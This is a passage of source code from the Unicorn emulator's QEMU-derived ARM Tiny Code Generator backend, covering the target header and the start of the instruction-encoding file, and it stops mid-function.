#ifndef ARM_TCG_TARGET_H #define ARM_TCG_TARGET_H /* The __ARM_ARCH define is provided by gcc 4.8. Construct it otherwise. */ #ifndef __ARM_ARCH # if defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) \ || defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__) \ || defined(__ARM_ARCH_7EM__) # define __ARM_ARCH 7 # elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) \ || defined(__ARM_ARCH_6Z__) || defined(__ARM_ARCH_6ZK__) \ || defined(__ARM_ARCH_6K__) || defined(__ARM_ARCH_6T2__) # define __ARM_ARCH 6 # elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5E__) \ || defined(__ARM_ARCH_5T__) || defined(__ARM_ARCH_5TE__) \ || defined(__ARM_ARCH_5TEJ__) # define __ARM_ARCH 5 # else # define __ARM_ARCH 4 # endif #endif extern int arm_arch; #if defined(__ARM_ARCH_5T__) \ || defined(__ARM_ARCH_5TE__) || defined(__ARM_ARCH_5TEJ__) # define use_armv5t_instructions 1 #else # define use_armv5t_instructions use_armv6_instructions #endif #define use_armv6_instructions (__ARM_ARCH >= 6 || arm_arch >= 6) #define use_armv7_instructions (__ARM_ARCH >= 7 || arm_arch >= 7) #undef TCG_TARGET_STACK_GROWSUP #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 16 typedef enum { TCG_REG_R0 = 0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_PC, } TCGReg; #define TCG_TARGET_NB_REGS 16 #ifndef __ARM_ARCH_EXT_IDIV__ extern bool use_idiv_instructions; // Unicorn: Don't have the same name with macro #endif /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_R13 #define TCG_TARGET_STACK_ALIGN 8 #define TCG_TARGET_CALL_ALIGN_ARGS 1 #define TCG_TARGET_CALL_STACK_OFFSET 0 /* optional instructions */ #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 0 /* and r0, r1, #0xff */ #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_andc_i32 1 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 use_armv5t_instructions #define TCG_TARGET_HAS_ctz_i32 use_armv7_instructions #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_deposit_i32 use_armv7_instructions #define TCG_TARGET_HAS_extract_i32 use_armv7_instructions #define TCG_TARGET_HAS_sextract_i32 use_armv7_instructions #define TCG_TARGET_HAS_extract2_i32 1 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_mulu2_i32 1 #define TCG_TARGET_HAS_muls2_i32 1 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #ifdef __ARM_ARCH_EXT_IDIV__ #define TCG_TARGET_HAS_div_i32 1 #else #define TCG_TARGET_HAS_div_i32 use_idiv_instructions #endif #define TCG_TARGET_HAS_rem_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 0 enum { TCG_AREG0 = TCG_REG_R6, }; #define TCG_TARGET_DEFAULT_MO (0) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { __builtin___clear_cache((char *) start, (char *) stop); } /* not defined -- call should be eliminated at compile time */ void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #define TCG_TARGET_NEED_POOL_LABELS #endif ��������������������������������unicorn-2.1.1/qemu/tcg/arm/tcg-target.inc.c���������������������������������������������������������0000664�0000000�0000000�00000233321�14675241067�0020470�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Andrzej Zaborowski * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "elf.h" #include "../tcg-pool.inc.c" int arm_arch = __ARM_ARCH; #ifndef __ARM_ARCH_EXT_IDIV__ bool use_idiv_instructions; #endif /* ??? Ought to think about changing CONFIG_SOFTMMU to always defined. */ #ifdef CONFIG_SOFTMMU # define USING_SOFTMMU 1 #else # define USING_SOFTMMU 0 #endif #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "%r0", "%r1", "%r2", "%r3", "%r4", "%r5", "%r6", "%r7", "%r8", "%r9", "%r10", "%r11", "%r12", "%r13", "%r14", "%pc", }; #endif static const int tcg_target_reg_alloc_order[] = { TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R13, TCG_REG_R0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, TCG_REG_R12, TCG_REG_R14, }; static const int tcg_target_call_iarg_regs[4] = { TCG_REG_R0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3 }; static const int tcg_target_call_oarg_regs[2] = { TCG_REG_R0, TCG_REG_R1 }; #define TCG_REG_TMP TCG_REG_R12 enum arm_cond_code_e { COND_EQ = 0x0, COND_NE = 0x1, COND_CS = 0x2, /* Unsigned greater or equal */ COND_CC = 0x3, /* Unsigned less than */ COND_MI = 0x4, /* Negative */ COND_PL = 0x5, /* Zero or greater */ COND_VS = 0x6, /* Overflow */ COND_VC = 0x7, /* No overflow */ COND_HI = 0x8, /* Unsigned greater than */ COND_LS = 0x9, /* Unsigned less or equal */ COND_GE = 0xa, COND_LT = 0xb, COND_GT = 0xc, COND_LE = 0xd, COND_AL = 0xe, }; #define TO_CPSR (1 << 20) #define SHIFT_IMM_LSL(im) (((im) << 7) | 0x00) #define SHIFT_IMM_LSR(im) (((im) << 7) | 0x20) #define SHIFT_IMM_ASR(im) (((im) << 7) | 0x40) #define SHIFT_IMM_ROR(im) (((im) << 7) | 0x60) #define SHIFT_REG_LSL(rs) (((rs) << 8) | 0x10) #define SHIFT_REG_LSR(rs) (((rs) << 8) | 0x30) #define SHIFT_REG_ASR(rs) (((rs) << 8) | 0x50) #define SHIFT_REG_ROR(rs) (((rs) << 8) | 0x70) typedef enum { ARITH_AND = 0x0 << 21, ARITH_EOR = 0x1 << 21, ARITH_SUB = 0x2 << 21, ARITH_RSB = 0x3 << 21, ARITH_ADD = 0x4 << 21, ARITH_ADC = 0x5 << 21, ARITH_SBC = 0x6 << 21, ARITH_RSC = 0x7 << 21, ARITH_TST = 0x8 << 21 | TO_CPSR, ARITH_CMP = 0xa << 21 | TO_CPSR, ARITH_CMN = 0xb << 21 | TO_CPSR, ARITH_ORR = 0xc << 21, ARITH_MOV = 0xd << 21, ARITH_BIC = 0xe << 21, ARITH_MVN = 0xf << 21, INSN_CLZ = 0x016f0f10, INSN_RBIT = 0x06ff0f30, INSN_LDR_IMM = 0x04100000, INSN_LDR_REG = 0x06100000, INSN_STR_IMM = 0x04000000, INSN_STR_REG = 0x06000000, INSN_LDRH_IMM = 0x005000b0, INSN_LDRH_REG = 0x001000b0, INSN_LDRSH_IMM = 0x005000f0, INSN_LDRSH_REG = 0x001000f0, INSN_STRH_IMM = 0x004000b0, INSN_STRH_REG = 0x000000b0, INSN_LDRB_IMM = 0x04500000, INSN_LDRB_REG = 0x06500000, INSN_LDRSB_IMM = 0x005000d0, INSN_LDRSB_REG = 0x001000d0, INSN_STRB_IMM = 0x04400000, INSN_STRB_REG = 0x06400000, INSN_LDRD_IMM = 0x004000d0, INSN_LDRD_REG = 0x000000d0, INSN_STRD_IMM = 0x004000f0, INSN_STRD_REG = 0x000000f0, INSN_DMB_ISH = 0xf57ff05b, INSN_DMB_MCR = 0xee070fba, /* Architected nop introduced in v6k. */ /* ??? This is an MSR (imm) 0,0,0 insn. Anyone know if this also Just So Happened to do nothing on pre-v6k so that we don't need to conditionalize it? */ INSN_NOP_v6k = 0xe320f000, /* Otherwise the assembler uses mov r0,r0 */ INSN_NOP_v4 = (COND_AL << 28) | ARITH_MOV, } ARMInsn; #define INSN_NOP (use_armv7_instructions ? INSN_NOP_v6k : INSN_NOP_v4) static const uint8_t tcg_cond_to_arm_cond[] = { [TCG_COND_EQ] = COND_EQ, [TCG_COND_NE] = COND_NE, [TCG_COND_LT] = COND_LT, [TCG_COND_GE] = COND_GE, [TCG_COND_LE] = COND_LE, [TCG_COND_GT] = COND_GT, /* unsigned */ [TCG_COND_LTU] = COND_CC, [TCG_COND_GEU] = COND_CS, [TCG_COND_LEU] = COND_LS, [TCG_COND_GTU] = COND_HI, }; static inline bool reloc_pc24(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { ptrdiff_t offset = (tcg_ptr_byte_diff(target, code_ptr) - 8) >> 2; if (offset == sextract32(offset, 0, 24)) { *code_ptr = (*code_ptr & ~0xffffff) | (offset & 0xffffff); return true; } return false; } static inline bool reloc_pc13(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { ptrdiff_t offset = tcg_ptr_byte_diff(target, code_ptr) - 8; if (offset >= -0xfff && offset <= 0xfff) { tcg_insn_unit insn = *code_ptr; bool u = (offset >= 0); if (!u) { offset = -offset; } insn = deposit32(insn, 23, 1, u); insn = deposit32(insn, 0, 12, offset); *code_ptr = insn; return true; } return false; } static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { tcg_debug_assert(addend == 0); if (type == R_ARM_PC24) { return reloc_pc24(code_ptr, (tcg_insn_unit *)value); } else if (type == R_ARM_PC13) { return reloc_pc13(code_ptr, (tcg_insn_unit *)value); } else { g_assert_not_reached(); } } #define TCG_CT_CONST_ARM 0x100 #define TCG_CT_CONST_INV 0x200 #define TCG_CT_CONST_NEG 0x400 #define TCG_CT_CONST_ZERO 0x800 /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'I': ct->ct |= TCG_CT_CONST_ARM; break; case 'K': ct->ct |= TCG_CT_CONST_INV; break; case 'N': /* The gcc constraint letter is L, already used here. */ ct->ct |= TCG_CT_CONST_NEG; break; case 'Z': ct->ct |= TCG_CT_CONST_ZERO; break; case 'r': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; break; /* qemu_ld address */ case 'l': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; #ifdef CONFIG_SOFTMMU /* r0-r2,lr will be overwritten when reading the tlb entry, so don't use these. */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_R0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R1); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R2); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R14); #endif break; /* qemu_st address & data */ case 's': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; /* r0-r2 will be overwritten when reading the tlb entry (softmmu only) and r0-r1 doing the byte swapping, so don't use these. */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_R0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R1); #if defined(CONFIG_SOFTMMU) /* Avoid clashes with registers being used for helper args */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_R2); #if TARGET_LONG_BITS == 64 /* Avoid clashes with registers being used for helper args */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); #endif tcg_regset_reset_reg(ct->u.regs, TCG_REG_R14); #endif break; default: return NULL; } return ct_str; } static inline uint32_t rotl(uint32_t val, int n) { return (val << n) | (val >> (32 - n)); } /* ARM immediates for ALU instructions are made of an unsigned 8-bit right-rotated by an even amount between 0 and 30. */ static inline int encode_imm(uint32_t imm) { int shift; /* simple case, only lower bits */ if ((imm & ~0xff) == 0) return 0; /* then try a simple even shift */ shift = ctz32(imm) & ~1; if (((imm >> shift) & ~0xff) == 0) return 32 - shift; /* now try harder with rotations */ if ((rotl(imm, 2) & ~0xff) == 0) return 2; if ((rotl(imm, 4) & ~0xff) == 0) return 4; if ((rotl(imm, 6) & ~0xff) == 0) return 6; /* imm can't be encoded */ return -1; } static inline int check_fit_imm(uint32_t imm) { return encode_imm(imm) >= 0; } /* Test if a constant matches the constraint. * TODO: define constraints for: * * ldr/str offset: between -0xfff and 0xfff * ldrh/strh offset: between -0xff and 0xff * mov operand2: values represented with x << (2 * y), x < 0x100 * add, sub, eor...: ditto */ static inline int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct; ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } else if ((ct & TCG_CT_CONST_ARM) && check_fit_imm(val)) { return 1; } else if ((ct & TCG_CT_CONST_INV) && check_fit_imm(~val)) { return 1; } else if ((ct & TCG_CT_CONST_NEG) && check_fit_imm(-val)) { return 1; } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } else { return 0; } } static inline void tcg_out_b(TCGContext *s, int cond, int32_t offset) { tcg_out32(s, (cond << 28) | 0x0a000000 | (((offset - 8) >> 2) & 0x00ffffff)); } static inline void tcg_out_bl(TCGContext *s, int cond, int32_t offset) { tcg_out32(s, (cond << 28) | 0x0b000000 | (((offset - 8) >> 2) & 0x00ffffff)); } static inline void tcg_out_blx(TCGContext *s, int cond, int rn) { tcg_out32(s, (cond << 28) | 0x012fff30 | rn); } static inline void tcg_out_blx_imm(TCGContext *s, int32_t offset) { tcg_out32(s, 0xfa000000 | ((offset & 2) << 23) | (((offset - 8) >> 2) & 0x00ffffff)); } static inline void tcg_out_dat_reg(TCGContext *s, int cond, int opc, int rd, int rn, int rm, int shift) { tcg_out32(s, (cond << 28) | (0 << 25) | opc | (rn << 16) | (rd << 12) | shift | rm); } static inline void tcg_out_nop(TCGContext *s) { tcg_out32(s, INSN_NOP); } static inline void tcg_out_mov_reg(TCGContext *s, int cond, int rd, int rm) { /* Simple reg-reg move, optimising out the 'do nothing' case */ if (rd != rm) { tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rm, SHIFT_IMM_LSL(0)); } } static inline void tcg_out_bx(TCGContext *s, int cond, TCGReg rn) { /* Unless the C portion of QEMU is compiled as thumb, we don't actually need true BX semantics; merely a branch to an address held in a register. */ if (use_armv5t_instructions) { tcg_out32(s, (cond << 28) | 0x012fff10 | rn); } else { tcg_out_mov_reg(s, cond, TCG_REG_PC, rn); } } static inline void tcg_out_dat_imm(TCGContext *s, int cond, int opc, int rd, int rn, int im) { tcg_out32(s, (cond << 28) | (1 << 25) | opc | (rn << 16) | (rd << 12) | im); } /* Note that this routine is used for both LDR and LDRH formats, so we do not wish to include an immediate shift at this point. */ static void tcg_out_memop_r(TCGContext *s, int cond, ARMInsn opc, TCGReg rt, TCGReg rn, TCGReg rm, bool u, bool p, bool w) { tcg_out32(s, (cond << 28) | opc | (u << 23) | (p << 24) | (w << 21) | (rn << 16) | (rt << 12) | rm); } static void tcg_out_memop_8(TCGContext *s, int cond, ARMInsn opc, TCGReg rt, TCGReg rn, int imm8, bool p, bool w) { bool u = 1; if (imm8 < 0) { imm8 = -imm8; u = 0; } tcg_out32(s, (cond << 28) | opc | (u << 23) | (p << 24) | (w << 21) | (rn << 16) | (rt << 12) | ((imm8 & 0xf0) << 4) | (imm8 & 0xf)); } static void tcg_out_memop_12(TCGContext *s, int cond, ARMInsn opc, TCGReg rt, TCGReg rn, int imm12, bool p, bool w) { bool u = 1; if (imm12 < 0) { imm12 = -imm12; u = 0; } tcg_out32(s, (cond << 28) | opc | (u << 23) | (p << 24) | (w << 21) | (rn << 16) | (rt << 12) | imm12); } static inline void tcg_out_ld32_12(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm12) { tcg_out_memop_12(s, cond, INSN_LDR_IMM, rt, rn, imm12, 1, 0); } static inline void tcg_out_st32_12(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm12) { tcg_out_memop_12(s, cond, INSN_STR_IMM, rt, rn, imm12, 1, 0); } static inline void tcg_out_ld32_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDR_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_st32_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STR_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ldrd_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_LDRD_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_ldrd_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRD_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ldrd_rwb(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRD_REG, rt, rn, rm, 1, 1, 1); } static inline void tcg_out_strd_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_STRD_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_strd_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STRD_REG, rt, rn, rm, 1, 1, 0); } /* Register pre-increment with base writeback. */ static inline void tcg_out_ld32_rwb(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDR_REG, rt, rn, rm, 1, 1, 1); } static inline void tcg_out_st32_rwb(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STR_REG, rt, rn, rm, 1, 1, 1); } static inline void tcg_out_ld16u_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_LDRH_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_st16_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_STRH_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_ld16u_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRH_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_st16_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STRH_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ld16s_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_LDRSH_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_ld16s_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRSH_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ld8_12(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm12) { tcg_out_memop_12(s, cond, INSN_LDRB_IMM, rt, rn, imm12, 1, 0); } static inline void tcg_out_st8_12(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm12) { tcg_out_memop_12(s, cond, INSN_STRB_IMM, rt, rn, imm12, 1, 0); } static inline void tcg_out_ld8_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRB_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_st8_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STRB_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ld8s_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_LDRSB_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_ld8s_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRSB_REG, rt, rn, rm, 1, 1, 0); } static void tcg_out_movi_pool(TCGContext *s, int cond, int rd, uint32_t arg) { new_pool_label(s, arg, R_ARM_PC13, s->code_ptr, 0); tcg_out_ld32_12(s, cond, rd, TCG_REG_PC, 0); } static void tcg_out_movi32(TCGContext *s, int cond, int rd, uint32_t arg) { int rot, diff, opc, sh1, sh2; uint32_t tt0, tt1, tt2; /* Check a single MOV/MVN before anything else. */ rot = encode_imm(arg); if (rot >= 0) { tcg_out_dat_imm(s, cond, ARITH_MOV, rd, 0, rotl(arg, rot) | (rot << 7)); return; } rot = encode_imm(~arg); if (rot >= 0) { tcg_out_dat_imm(s, cond, ARITH_MVN, rd, 0, rotl(~arg, rot) | (rot << 7)); return; } /* Check for a pc-relative address. This will usually be the TB, or within the TB, which is immediately before the code block. */ diff = arg - ((intptr_t)s->code_ptr + 8); if (diff >= 0) { rot = encode_imm(diff); if (rot >= 0) { tcg_out_dat_imm(s, cond, ARITH_ADD, rd, TCG_REG_PC, rotl(diff, rot) | (rot << 7)); return; } } else { rot = encode_imm(-diff); if (rot >= 0) { tcg_out_dat_imm(s, cond, ARITH_SUB, rd, TCG_REG_PC, rotl(-diff, rot) | (rot << 7)); return; } } /* Use movw + movt. */ if (use_armv7_instructions) { /* movw */ tcg_out32(s, (cond << 28) | 0x03000000 | (rd << 12) | ((arg << 4) & 0x000f0000) | (arg & 0xfff)); if (arg & 0xffff0000) { /* movt */ tcg_out32(s, (cond << 28) | 0x03400000 | (rd << 12) | ((arg >> 12) & 0x000f0000) | ((arg >> 16) & 0xfff)); } return; } /* Look for sequences of two insns. If we have lots of 1's, we can shorten the sequence by beginning with mvn and then clearing higher bits with eor. */ tt0 = arg; opc = ARITH_MOV; if (ctpop32(arg) > 16) { tt0 = ~arg; opc = ARITH_MVN; } sh1 = ctz32(tt0) & ~1; tt1 = tt0 & ~(0xff << sh1); sh2 = ctz32(tt1) & ~1; tt2 = tt1 & ~(0xff << sh2); if (tt2 == 0) { rot = ((32 - sh1) << 7) & 0xf00; tcg_out_dat_imm(s, cond, opc, rd, 0, ((tt0 >> sh1) & 0xff) | rot); rot = ((32 - sh2) << 7) & 0xf00; tcg_out_dat_imm(s, cond, ARITH_EOR, rd, rd, ((tt0 >> sh2) & 0xff) | rot); return; } /* Otherwise, drop it into the constant pool. */ tcg_out_movi_pool(s, cond, rd, arg); } static inline void tcg_out_dat_rI(TCGContext *s, int cond, int opc, TCGArg dst, TCGArg lhs, TCGArg rhs, int rhs_is_const) { /* Emit either the reg,imm or reg,reg form of a data-processing insn. * rhs must satisfy the "rI" constraint. */ if (rhs_is_const) { int rot = encode_imm(rhs); tcg_debug_assert(rot >= 0); tcg_out_dat_imm(s, cond, opc, dst, lhs, rotl(rhs, rot) | (rot << 7)); } else { tcg_out_dat_reg(s, cond, opc, dst, lhs, rhs, SHIFT_IMM_LSL(0)); } } static void tcg_out_dat_rIK(TCGContext *s, int cond, int opc, int opinv, TCGReg dst, TCGReg lhs, TCGArg rhs, bool rhs_is_const) { /* Emit either the reg,imm or reg,reg form of a data-processing insn. * rhs must satisfy the "rIK" constraint. */ if (rhs_is_const) { int rot = encode_imm(rhs); if (rot < 0) { rhs = ~rhs; rot = encode_imm(rhs); tcg_debug_assert(rot >= 0); opc = opinv; } tcg_out_dat_imm(s, cond, opc, dst, lhs, rotl(rhs, rot) | (rot << 7)); } else { tcg_out_dat_reg(s, cond, opc, dst, lhs, rhs, SHIFT_IMM_LSL(0)); } } static void tcg_out_dat_rIN(TCGContext *s, int cond, int opc, int opneg, TCGArg dst, TCGArg lhs, TCGArg rhs, bool rhs_is_const) { /* Emit either the reg,imm or reg,reg form of a data-processing insn. * rhs must satisfy the "rIN" constraint. */ if (rhs_is_const) { int rot = encode_imm(rhs); if (rot < 0) { rhs = -rhs; rot = encode_imm(rhs); tcg_debug_assert(rot >= 0); opc = opneg; } tcg_out_dat_imm(s, cond, opc, dst, lhs, rotl(rhs, rot) | (rot << 7)); } else { tcg_out_dat_reg(s, cond, opc, dst, lhs, rhs, SHIFT_IMM_LSL(0)); } } static inline void tcg_out_mul32(TCGContext *s, int cond, TCGReg rd, TCGReg rn, TCGReg rm) { /* if ArchVersion() < 6 && d == n then UNPREDICTABLE; */ if (!use_armv6_instructions && rd == rn) { if (rd == rm) { /* rd == rn == rm; copy an input to tmp first. */ tcg_out_mov_reg(s, cond, TCG_REG_TMP, rn); rm = rn = TCG_REG_TMP; } else { rn = rm; rm = rd; } } /* mul */ tcg_out32(s, (cond << 28) | 0x90 | (rd << 16) | (rm << 8) | rn); } static inline void tcg_out_umull32(TCGContext *s, int cond, TCGReg rd0, TCGReg rd1, TCGReg rn, TCGReg rm) { /* if ArchVersion() < 6 && (dHi == n || dLo == n) then UNPREDICTABLE; */ if (!use_armv6_instructions && (rd0 == rn || rd1 == rn)) { if (rd0 == rm || rd1 == rm) { tcg_out_mov_reg(s, cond, TCG_REG_TMP, rn); rn = TCG_REG_TMP; } else { TCGReg t = rn; rn = rm; rm = t; } } /* umull */ tcg_out32(s, (cond << 28) | 0x00800090 | (rd1 << 16) | (rd0 << 12) | (rm << 8) | rn); } static inline void tcg_out_smull32(TCGContext *s, int cond, TCGReg rd0, TCGReg rd1, TCGReg rn, TCGReg rm) { /* if ArchVersion() < 6 && (dHi == n || dLo == n) then UNPREDICTABLE; */ if (!use_armv6_instructions && (rd0 == rn || rd1 == rn)) { if (rd0 == rm || rd1 == rm) { tcg_out_mov_reg(s, cond, TCG_REG_TMP, rn); rn = TCG_REG_TMP; } else { TCGReg t = rn; rn = rm; rm = t; } } /* smull */ tcg_out32(s, (cond << 28) | 0x00c00090 | (rd1 << 16) | (rd0 << 12) | (rm << 8) | rn); } static inline void tcg_out_sdiv(TCGContext *s, int cond, int rd, int rn, int rm) { tcg_out32(s, 0x0710f010 | (cond << 28) | (rd << 16) | rn | (rm << 8)); } static inline void tcg_out_udiv(TCGContext *s, int cond, int rd, int rn, int rm) { tcg_out32(s, 0x0730f010 | (cond << 28) | (rd << 16) | rn | (rm << 8)); } static inline void tcg_out_ext8s(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* sxtb */ tcg_out32(s, 0x06af0070 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rn, SHIFT_IMM_LSL(24)); tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rd, SHIFT_IMM_ASR(24)); } } static inline void tcg_out_ext8u(TCGContext *s, int cond, int rd, int rn) { tcg_out_dat_imm(s, cond, ARITH_AND, rd, rn, 0xff); } static inline void tcg_out_ext16s(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* sxth */ tcg_out32(s, 0x06bf0070 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rn, SHIFT_IMM_LSL(16)); tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rd, SHIFT_IMM_ASR(16)); } } static inline void tcg_out_ext16u(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* uxth */ tcg_out32(s, 0x06ff0070 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rn, SHIFT_IMM_LSL(16)); tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rd, SHIFT_IMM_LSR(16)); } } static inline void tcg_out_bswap16s(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* revsh */ tcg_out32(s, 0x06ff0fb0 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, rn, SHIFT_IMM_LSL(24)); tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, TCG_REG_TMP, SHIFT_IMM_ASR(16)); tcg_out_dat_reg(s, cond, ARITH_ORR, rd, 